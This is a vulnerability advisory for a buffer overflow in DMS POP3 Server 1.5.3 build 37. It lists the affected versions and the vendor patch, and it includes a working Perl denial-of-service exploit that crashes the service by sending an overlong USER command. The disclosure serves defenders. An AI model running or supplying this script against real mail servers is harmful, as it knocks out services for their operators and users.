Summary: A buffer overflow exists in DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 (http://www.digitalmapping.sk.ca/pop3srv/default.asp) and prior versions. Details: A buffer overflow occurs during the POP3 authentication process when an overly long username is supplied. When the username buffer is overflowed successfully the DMS POP3 Service dies resulting in a denial of service. Vulnerable Versions: DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 and prior versions Solutions: The vendor has provided a patch to fix this issue: http://www.digitalmapping.sk.ca/pop3srv/Update.asp Exploit: #===== Start DMS_POP3_Overflow.pl ===== # # Usage: DMS_POP3_Overflow.pl <ip> <port> # DMS_POP3_Overflow.pl 127.0.0.1 110 # # DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 # # Download: # http://www.digitalmapping.sk.ca/pop3srv/default.asp # # Patch: # http://www.digitalmapping.sk.ca/pop3srv/Update.asp # ##################################################### use IO::Socket; use strict; my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => "TCP")) { print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]..."; sleep(1); print $socket "USER " . "A" x 1023; close $socket; sleep(1); if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => "TCP")) { close $socket; print "failed!\n"; } else { print "successful!\n"; } } else { print "Cannot connect to $ARGV[0]:$ARGV[1]\n"; } #===== End DMS_POP3_Overflow.pl ===== Discovered by Reed Arvin reedarvin[at]gmail[dot]com
